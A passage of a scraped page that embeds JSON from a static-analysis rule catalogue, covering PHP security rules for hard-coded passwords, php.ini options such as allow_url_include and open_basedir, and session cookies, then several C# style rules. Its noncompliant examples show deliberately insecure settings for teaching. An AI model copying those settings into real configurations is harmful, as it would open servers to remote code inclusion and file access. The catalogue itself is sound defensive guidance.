$password);\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$uname = getEncryptedUser();\n$password = getEncryptedPass();\nconnect($uname, $password);\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/798\">MITRE, CWE-798<\/a> - Use of Hard-coded Credentials <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/259\">MITRE, CWE-259<\/a> - Use of Hard-coded Password <\/li>\n <li> <a href=\"http:\/\/www.sans.org\/top25-software-errors\/\">SANS Top 25<\/a> - Porous Defenses <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/qQCHAQ\">CERT, MSC03-J.<\/a> - Never hard code sensitive information <\/li>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A2-Broken_Authentication_and_Session_Management\">OWASP Top Ten 2013 Category A2<\/a> -\n Broken Authentication and Session Management <\/li>\n <li> Derived from FindSecBugs rule <a href=\"http:\/\/h3xstream.github.io\/find-sec-bugs\/bugs.htm#HARD_CODE_PASSWORD\">Hard Coded Password<\/a> <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S2260","repo":"php","name":"PHP parser failure","htmlDesc":"<p>When the PHP parser fails, it is possible to record the failure as a violation on the file. This way, not only it is possible to track the number\nof files that do not parse but also to easily find out why they do not parse.<\/p>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2681","repo":"php","name":"Multiline blocks should be enclosed in curly braces","htmlDesc":"<p>Curly braces can be omitted from a one-line block, such as with an <code>if<\/code> statement or <code>for<\/code> loop, but doing so can be\nmisleading and induce bugs. <\/p>\n<p>This rule raises an issue when the indentation of the lines after a one-line block indicates an intent to include those lines in the block, but the\nomission of curly braces means the lines will be unconditionally executed once.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ($condition)\n firstActionInBlock();\n secondAction(); \/\/ Noncompliant; executed unconditionally\nthirdAction();\n\n$str = null;\nfor ($i = 0; $i < count($array); $i++)\n $str = $array[$i];\n doTheThing($str); \/\/ Noncompliant; executed only on last array element\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ($condition) {\n firstActionInBlock();\n secondAction();\n}\nthirdAction();\n\n$str = null;\nfor ($i = 0; $i < count($array); $i++) {\n $str = $array[$i];\n doTheThing($str);\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/483.html\">MITRE, CWE-483<\/a> - Incorrect Block Delimitation <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/3wHEAw\">CERT, EXP52-J.<\/a> - Use braces for the body of an if, for, or while statement\n <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2830","repo":"php","name":"Class constructors should not create other objects","htmlDesc":"<p>Dependency injection is a software design pattern in which one or more dependencies (or services) are injected, or passed by reference, into a\ndependent object (or client) and are made part of the client's state. The pattern separates the creation of a client's dependencies from its own\nbehavior, which allows program designs to be loosely coupled and to follow the dependency inversion and single responsibility principles.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass SomeClass {\n\n public function __construct() {\n $this->object = new SomeOtherClass(); \/\/ Noncompliant\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass SomeClass {\n\n public function __construct(SomeOtherClass $object) {\n $this->object = $object;\n }\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S3332","repo":"php","name":"Session-management cookies should not be persistent","htmlDesc":"<p>Cookies without fixed lifetimes or expiration dates are known as non-persistent, or \"session\" cookies, meaning they last only as long as the\nbrowser session, and poof away when the browser closes. Cookies with expiration dates, \"persistent\" cookies, are stored\/persisted until those\ndates.<\/p>\n<p>Non-persistent cookies should be used for the management of logged-in sessions on web sites. To make a cookie non-persistent, simply omit the\n<code>expires<\/code> attribute.<\/p>\n<p>This rule raises an issue when <code>expires<\/code> is set for a session cookie, either programmatically or via configuration, such as\n<code>session.cookie_lifetime<\/code>.<\/p>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A3-Cross-Site_Scripting_(XSS)\">OWASP Top Ten 2013 Category A3<\/a> - Cross-Site Scripting\n (XSS) <\/li>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Session_Management_Cheat_Sheet#Expire_and_Max-Age_Attributes\">OWASP, Session Management Cheat\n Sheet<\/a> - Expire and Max-Age Attributes <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S3333","repo":"php","name":"\"open_basedir\" should limit file access","htmlDesc":"<p>The <code>open_basedir<\/code> configuration in <em>php.ini<\/em> limits the files the script can access using, for example, <code>include<\/code> and\n<code>fopen()<\/code>. Leave it out, and there is no default limit, meaning that any file can be accessed. Include it, and PHP will refuse to access\nfiles outside the allowed path.<\/p>\n<p><code>open_basedir<\/code> should be configured with a directory, which will then be accessible recursively. However, the use of <code>.<\/code>\n(current directory) as an <code>open_basedir<\/code> value should be avoided since it's resolved dynamically during script execution, so a\n<code>chdir('\/')<\/code> command could lay the whole server open to the script.<\/p>\n<p>This is not a fool-proof configuration; it can be reset or overridden at the script level. But its use should be seen as a minimum due diligence\nstep. This rule raises an issue when <code>open_basedir<\/code> is not present in <em>php.ini<\/em>, and when <code>open_basedir<\/code> contains root,\nor the current directory (<code>.<\/code>) symbol.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n; php.ini try 1\n; open_basedir=\"${USER}\/scripts\/data\" Noncompliant; commented out\n\n; php.ini try 2\nopen_basedir=\"\/:${USER}\/scripts\/data\" ; Noncompliant; root directory in the list\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n; php.ini try 1\nopen_basedir=\"${USER}\/scripts\/data\"\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/23.html\">MITRE, CWE-23<\/a> - Relative Path Traversal <\/li>\n <li> <a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/36.html\">MITRE, CWE-36<\/a> - Absolute Path Traversal <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S3334","repo":"php","name":"\"allow_url_fopen\" and \"allow_url_include\" should be disabled","htmlDesc":"<p><code>allow_url_fopen<\/code> and <code>allow_url_include<\/code> allow code to be read into a script from URL's. The ability to suck in executable\ncode from outside your site, coupled with imperfect input cleansing could lay your site bare to attackers. Even if your input filtering is perfect\ntoday, are you prepared to bet your site that it will always be perfect in the future?<\/p>\n<p>This rule raises an issue when either property is explicitly enabled in <em>php.ini<\/em> and when <code>allow_url_fopen<\/code>, which defaults to\nenabled, is not explicitly disabled.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n; php.ini Noncompliant; allow_url_fopen not explicitly disabled\nallow_url_include=1 ; Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n; php.ini\nallow_url_fopen=0\nallow_url_include=0\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/829.html\">MITRE, CWE-829<\/a> - Inclusion of Functionality from Untrusted Control Sphere <\/li>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A1-Injection\">OWASP Top Ten 2013 Category A1<\/a> - Injection <\/li>\n <li> <a href=\"http:\/\/www.sans.org\/top25-software-errors\/\">SANS Top 25<\/a> - Risky Resource Management <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S3335","repo":"php","name":"\"cgi.force_redirect\" should be enabled","htmlDesc":"<p>The <code>cgi.force_redirect<\/code> <em>php.ini<\/em> configuration is on by default, and it prevents unauthenticated access to scripts when PHP is\nrunning as a CGI. Unfortunately, it must be disabled on IIS, OmniHTTPD and Xitami, but in all other cases it should be on.<\/p>\n<p>This rule raises an issue when when <code>cgi.force_redirect<\/code> is explicitly disabled.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n; php.ini\ncgi.force_redirect=0 ; Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/305\">MITRE, CWE-305<\/a> - Authentication Bypass by Primary Weakness <\/li>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A5-Security_Misconfiguration\">OWASP Top Ten 2013 Category A5<\/a> - Security\n Misconfiguration <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S3336","repo":"php","name":"\"session.use_trans_sid\" should not be enabled","htmlDesc":"<p>PHP's <code>session.use_trans_sid<\/code> automatically appends the user's session id to urls when cookies are disabled. On the face of it, this\nseems like a nice way to let uncookie-able users use your site anyway. In reality, it makes those users vulnerable to having their sessions hijacked\nby anyone who might:<\/p>\n<ul>\n <li> see the URL over the user's shoulder <\/li>\n <li> be sent the URL by the user <\/li>\n <li> retrieve the URL from browser history <\/li>\n <li> ... <\/li>\n<\/ul>\n<p>For that reason, it's better to practice a little \"tough love\" with your users and force them to turn on cookies.<\/p>\n<p>Since <code>session.use_trans_sid<\/code> is off by default, this rule raises an issue when it is explicitly enabled.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n; php.ini\nsession.use_trans_sid=1 ; Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A5-Security_Misconfiguration\">OWASP Top Ten 2013 Category A5<\/a> - Security\n Misconfiguration <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S3337","repo":"php","name":"\"enable_dl\" should be disabled","htmlDesc":"<p><code>enable_dl<\/code> is on by default and allows <code>open_basedir<\/code> restrictions, which limit the files a script can access, to be\nignored. For that reason, it's a dangerous option and should be explicitly turned off.<\/p>\n<p>This rule raises an issue when <code>enable_dl<\/code> is not explicitly set to 0 in <em>php.ini<\/em>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n; php.ini\nenable_dl=1 ; Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n; php.ini\nenable_dl=0\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/23.html\">MITRE, CWE-23<\/a> - Relative Path Traversal <\/li>\n <li> <a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/36.html\">MITRE, CWE-36<\/a> - Absolute Path Traversal <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S3338","repo":"php","name":"\"file_uploads\" should be disabled","htmlDesc":"<p><code>file_uploads<\/code> is an on-by-default PHP configuration that allows files to be uploaded to your site. Since accepting <del>candy<\/del>\nfiles from strangers is inherently dangerous, this feature should be disabled unless it is absolutely necessary for your site.<\/p>\n<p>This rule raises an issue when <code>file_uploads<\/code> is not explicitly disabled.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n; php.ini\nfile_uploads=1 ; Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n; php.ini\nfile_uploads=0\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/434.html\">MITRE, CWE-434<\/a> - Unrestricted Upload of File with Dangerous Type <\/li>\n <li> <a href=\"http:\/\/www.sans.org\/top25-software-errors\/\">SANS Top 25<\/a> - Insecure Interaction Between Components <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S881","repo":"php","name":"Increment (++) and decrement (--) operators should not be used in a method call or mixed with other operators in an expression","htmlDesc":"<p>The use of increment and decrement operators in method calls or in combination with other arithmetic operators is not recommended, because:<\/p>\n<ul>\n <li> It can significantly impair the readability of the code. <\/li>\n <li> It introduces additional side effects into a statement, with the potential for undefined behavior. <\/li>\n <li> It is safer to use these operators in isolation from any other arithmetic operators. <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$u8a = ++$u8b + $u8c--;\n$foo = $bar++ \/ 4;\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<p>The following sequence is clearer and therefore safer:<\/p>\n<pre>\n++$u8b;\n$u8a = $u8b + $u8c;\n$u8c--;\n$foo = $bar \/ 4;\n$bar++;\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 12.1 - Limited dependence should be placed on the C operator precedence rules in expressions. <\/li>\n <li> MISRA C:2004, 12.13 - The increment (++) and decrement (--) operators should not be mixed with other operators in an expression. <\/li>\n <li> MISRA C++:2008, 5-2-10 - The increment (++) and decrement (--) operator should not be mixed with other operators in an expression. <\/li>\n <li> MISRA C:2012, 12.1 - The precedence of operators within expressions should be made explicit <\/li>\n <li> MISRA C:2012, 13.3 - A full expression containing an increment (++) or decrement (--) operator should have no other potential side effects\n other than that cause by the increment or decrement operator <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/ZwE\">CERT, EXP30-C.<\/a> - Do not depend on the order of evaluation for side effects\n <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/fYAyAQ\">CERT, EXP50-CPP.<\/a> - Do not depend on the order of evaluation for side\n effects <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/yQC7AQ\">CERT, EXP05-J.<\/a> - Do not follow a write by a subsequent write or read of the\n same object within an expression <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S905","repo":"php","name":"Non-empty statements should change control flow or have at least one side-effect","htmlDesc":"<p>Any statement (other than a null statement, which means a statement containing only a semicolon <code>;<\/code>) which has no side effect and does\nnot result in a change of control flow will normally indicate a programming error, and therefore should be refactored.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$a == 1; \/\/ Noncompliant; was assignment intended?\n$a < $b; \/\/ Noncompliant; have we forgotten to assign the result to a variable?\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/482\">MITRE, CWE-482<\/a> - Comparing instead of Assigning <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n <li> MISRA C:2004, 14.2 - All non-null statements shall either have at least one side-effect however executed, or cause control flow to change.\n <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S907","repo":"php","name":"\"goto\" statement should not be used","htmlDesc":"<p><code>goto<\/code> is an unstructured control flow statement. It makes code less readable and maintainable. Structured control flow statements such\nas <code>if<\/code>, <code>for<\/code>, <code>while<\/code>, <code>continue<\/code> or <code>break<\/code> should be used instead.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$i = 0;\nloop:\n echo(\"i = $i\");\n $i++;\n if ($i < 10){\n goto loop;\n }\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfor ($i = 0; $i < 10; $i++){\n echo(\"i = $i\");\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 14.4 - The goto statement shall not be used. <\/li>\n <li> MISRA C:2012, 15.1 - The goto statement should not be used <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"}],"language":"php","languages":{"cs":"C#","java":"Java","js":"JavaScript","objc":"Objective C","php":"PHP","swift":"Swift","vbnet":"VB.NET","android":"Android","py":"Python"},"ranktag":"^rank\\d$"};- Exclude checks
BUG found Open
Open
window.data = {"total":94,"p":1,"ps":500,"rules":[{"key":"csharpsquid:S100","repo":"csharpsquid","name":"Methods and properties should be named in camel case","htmlDesc":"<p>Shared naming conventions allow teams to collaborate efficiently. This rule checks whether or not method and property names are camel cased. To\nreduce noise, two consecutive upper case characters are allowed unless they form the whole name. So, <code>MyXMethod<\/code> is compliant, but\n<code>XM<\/code> on its own is not.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic int doSomething(){...}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic int DoSomething(){...}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>The rule ignores members in types that are marked with <code>ComImportAttribute<\/code> or <code>InterfaceTypeAttribute<\/code>. <code>extern<\/code>\nmethods are also excluded from the check. Furthermore, when <code>'_'<\/code> character is found in a name, the camel casing is not enforced.<\/p>\n<pre>\nvoid My_method(){...} \/\/ valid\nvoid My_method_(){...} \/\/ invalid, leading and trailing underscores are reported\n<\/pre>","status":"READY","tags":["rank1"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S103","repo":"csharpsquid","name":"Lines should not be too long","htmlDesc":"<p>Having to scroll horizontally makes it harder to get a quick overview and understanding of any piece of code.<\/p>","status":"READY","tags":["rank1"],"langName":"C#","params":[{"key":"maximumLineLength","htmlDesc":"The maximum authorized line length.","defaultValue":"200","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"csharpsquid:S1066","repo":"csharpsquid","name":"Collapsible \"if\" statements should be merged","htmlDesc":"<p>Merging collapsible <code>if<\/code> statements increases the code's readability.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (condition1)\n{\n if (condition2)\n {\n ...\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (condition1 && condition2)\n{\n ...\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S1067","repo":"csharpsquid","name":"Expressions should not be too complex","htmlDesc":"<p>The complexity of an expression is defined by the number of <code>&&<\/code>, <code>||<\/code> and <code>condition ? ifTrue : ifFalse<\/code>\noperators it contains.<\/p>\n<p>A single expression's complexity should not become too high to keep the code readable.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default threshold value of 3<\/p>\n<pre>\nif (((condition1 && condition2) || (condition3 && condition4)) && condition5) { ... }\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ((MyFirstCondition() || MySecondCondition()) && MyLastCondition()) { ... }\n<\/pre>","status":"READY","tags":["rank3"],"langName":"C#","params":[{"key":"max","htmlDesc":"Maximum number of allowed conditional operators in an expression","defaultValue":"3","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"csharpsquid:S107","repo":"csharpsquid","name":"Methods should not have too many parameters","htmlDesc":"<p>A long parameter list can indicate that a new structure should be created to wrap the numerous parameters or that the function is doing too many\nthings.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With a maximum number of 4 parameters:<\/p>\n<pre>\npublic void doSomething(int param1, int param2, int param3, string param4, long param5)\n{\n...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic void doSomething(int param1, int param2, int param3, string param4)\n{\n...\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"C#","params":[{"key":"max","htmlDesc":"Maximum authorized number of parameters","defaultValue":"7","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"csharpsquid:S1104","repo":"csharpsquid","name":"Fields should not have public accessibility","htmlDesc":"<p>Public fields in public classes do not respect the encapsulation principle and has three main disadvantages:<\/p>\n<ul>\n <li> Additional behavior such as validation cannot be added. <\/li>\n <li> The internal representation is exposed, and cannot be changed afterwards. <\/li>\n <li> Member values are subject to change from anywhere in the code and may not meet the programmer's assumptions. <\/li>\n<\/ul>\n<p>By using private fields and public properties (set and get), unauthorized modifications are prevented. Properties also benefit from additional\nprotection (security) features such as Link Demands.<\/p>\n<p>Note that due to optimizations on simple properties, public fields provide only very little performance gain.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic class Foo\n{\n public int instanceData = 32; \/\/ Noncompliant\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic class Foo\n{\n private int instanceData = 32;\n\n public int InstanceData\n {\n get { return instanceData; }\n\tset { instanceData = value ; }\n }\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Fields marked as <code>readonly<\/code> or <code>const<\/code> are ignored by this rule.<\/p>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/493.html\">MITRE, CWE-493<\/a> - Critical Public Variable Without Final Modifier <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"C#","params":[],"type":"VULNERABILITY"},{"key":"csharpsquid:S1109","repo":"csharpsquid","name":"A close curly brace should be located at the beginning of a line","htmlDesc":"<p>Shared coding conventions make it possible for a team to efficiently collaborate. This rule makes it mandatory to place a close curly brace at the\nbeginning of a line.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif(condition)\n{\n doSomething();}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif(condition)\n{\n doSomething();\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>When blocks are inlined (open and close curly braces on the same line), no issue is triggered. <\/p>\n<pre>\nif(condition) {doSomething();}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S1125","repo":"csharpsquid","name":"Boolean literals should not be redundant","htmlDesc":"<p>Redundant Boolean literals should be removed from expressions to improve readability.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (booleanMethod() == true) { \/* ... *\/ }\nif (booleanMethod() == false) { \/* ... *\/ }\nif (booleanMethod() || false) { \/* ... *\/ }\ndoSomething(!false);\ndoSomething(booleanMethod() == true);\n\nbooleanVariable = booleanMethod() ? true : false;\nbooleanVariable = booleanMethod() ? true : exp;\nbooleanVariable = booleanMethod() ? false : exp;\nbooleanVariable = booleanMethod() ? exp : true;\nbooleanVariable = booleanMethod() ? exp : false;\n\nfor (var x = 0; true; x++)\n{\n ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (booleanMethod()) { \/* ... *\/ }\nif (!booleanMethod()) { \/* ... *\/ }\nif (booleanMethod()) { \/* ... *\/ }\ndoSomething(true);\ndoSomething(booleanMethod());\n\nbooleanVariable = booleanMethod();\nbooleanVariable = booleanMethod() || exp;\nbooleanVariable = !booleanMethod() && exp;\nbooleanVariable = !booleanMethod() || exp;\nbooleanVariable = booleanMethod() && exp;\n\nfor (var x = 0; ; x++)\n{\n ...\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S1135","repo":"csharpsquid","name":"Track uses of \"TODO\" tags","htmlDesc":"<p><code>TODO<\/code> tags are commonly used to mark places where some more code is required, but which the developer wants to implement later.<\/p>\n<p>Sometimes the developer will not have the time or will simply forget to get back to that tag.<\/p>\n<p>This rule is meant to track those tags and to ensure that they do not go unnoticed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nprivate void DoSomething()\n{\n \/\/ TODO\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/546.html\">MITRE, CWE-546<\/a> - Suspicious Comment <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S1144","repo":"csharpsquid","name":"Unused private types or members should be removed","htmlDesc":"<p><code>private<\/code> or <code>internal<\/code> types or <code>private<\/code> members that are never executed or referenced are dead code:\nunnecessary, inoperative code that should be removed. Cleaning out dead code decreases the size of the maintained codebase, making it easier to\nunderstand the program and preventing bugs from being introduced.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic class Foo\n{\n private void UnusedPrivateMethod() {...} \/\/ Noncompliant\n\n private class UnusedClass {...} \/\/ Noncompliant\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic class Foo\n{\n private Foo()\n {\n UsedPrivateMethod();\n }\n\n private void UsedPrivateMethod()\n {\n var c = new UsedClass();\n }\n\n private class UsedClass {...}\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>This rule doesn't raise any issue on:<\/p>\n<ul>\n <li> Empty constructors <\/li>\n <li> Attributed members <\/li>\n <li> Empty serialization constructor on type with <code>System.SerializableAttribute<\/code> attribute. <\/li>\n <li> Internals in assemblies that have a <code>System.Runtime.CompilerServices.InternalsVisibleToAttribute<\/code> attribute. <\/li>\n<\/ul>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/OYIyAQ\">CERT, MSC07-CPP.<\/a> - Detect and remove dead code <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S1145","repo":"csharpsquid","name":"Useless \"if(true) {...}\" and \"if(false){...}\" blocks should be removed","htmlDesc":"<p><code>if<\/code> statements with conditions that are always false have the effect of making blocks of code non-functional. <code>if<\/code>\nstatements with conditions that are always true are completely redundant, and make the code less readable.<\/p>\n<p>There are three possible causes for the presence of such code: <\/p>\n<ul>\n <li> An if statement was changed during debugging and that debug code has been committed. <\/li>\n <li> Some value was left unset. <\/li>\n <li> Some logic is not doing what the programmer thought it did. <\/li>\n<\/ul>\n<p>In any of these cases, unconditional <code>if<\/code> statements should be removed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (true)\n{\n DoSomething();\n}\n...\nif (false)\n{\n DoSomethingElse();\n}\n\nif (2 < 3 ) { ... } \/\/ Noncompliant; always false\n\nint i = 0;\nint j = 0;\n\/\/ ...\nj = Foo();\n\nif (j > 0 && i > 0) { ... } \/\/ Noncompliant; always false - i never set after initialization\n\nbool b = true;\n\/\/...\nif (b || !b) { ... } \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nDoSomething();\n...\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/489.html\">MITRE, CWE-489<\/a> - Leftover Debug Code <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/570.html\">MITRE, CWE-570<\/a> - Expression is Always False <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/571.html\">MITRE, CWE-571<\/a> - Expression is Always True <\/li>\n <li> MISRA C:2004, 13.7 - Boolean operations whose results are invariant shall not be permitted. <\/li>\n <li> MISRA C:2012, 14.3 - Controlling expressions shall not be invariant <\/li>\n<\/ul>\n<h2>Deprecated<\/h2>\n<p>This rule is deprecated; use <a href='\/coding_rules#rule_key=csharpsquid%3AS2583'>S2583<\/a> instead.<\/p>","status":"READY","tags":["rank2"],"langName":"C#","params":[],"type":"BUG"},{"key":"csharpsquid:S1155","repo":"csharpsquid","name":"\"Any()\" should be used to test for emptiness","htmlDesc":"<p>Using <code>.Count()<\/code> to test for emptiness works, but using <code>.Any()<\/code> makes the intent clearer, and the code more readable.\nHowever, there are some cases where special attention should be paid:<\/p>\n<p>- if the collection is an <code>EntityFramework<\/code> or other ORM query, calling <code>.Count()<\/code> will cause executing a potentially massive\nSQL query and could put a large overhead on the application database. Calling <code>.Any()<\/code> will also connect to the database, but will generate\nmuch more efficient SQL.<\/p>\n<p>- if the collection is part of a LINQ query that contains <code>.Select()<\/code> statements that create objects, a large amount of memory could be\nunnecessarily allocated. Calling <code>.Any()<\/code> will be much more efficient because it will execute fewer iterations of the enumerable.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nprivate static bool HasContent(IEnumerable<string> strings)\n{\n return strings.Count() > 0; \/\/ Noncompliant\n}\n\nprivate static bool HasContent2(IEnumerable<string> strings)\n{\n return strings.Count() >= 1; \/\/ Noncompliant\n}\n\nprivate static bool IsEmpty(IEnumerable<string> strings)\n{\n return strings.Count() == 0; \/\/ Noncompliant\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nprivate static bool HasContent(IEnumerable<string> strings)\n{\n return strings.Any();\n}\n\nprivate static bool IsEmpty(IEnumerable<string> strings)\n{\n return !strings.Any();\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S1163","repo":"csharpsquid","name":"Exceptions should not be thrown in finally blocks","htmlDesc":"<p>Throwing an exception from within a finally block will mask any exception which was previously thrown in the <code>try<\/code> or <code>catch<\/code>\nblock, and the masked's exception message and stack trace will be lost.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\ntry\n{\n \/* some work which end up throwing an exception *\/\n throw new ArgumentException();\n}\nfinally\n{\n \/* clean up *\/\n throw new InvalidOperationException(); \/\/ Noncompliant; will mask the ArgumentException\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\ntry\n{\n \/* some work which end up throwing an exception *\/\n throw new ArgumentException();\n}\nfinally\n{\n \/* clean up *\/ \/\/ Compliant\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a 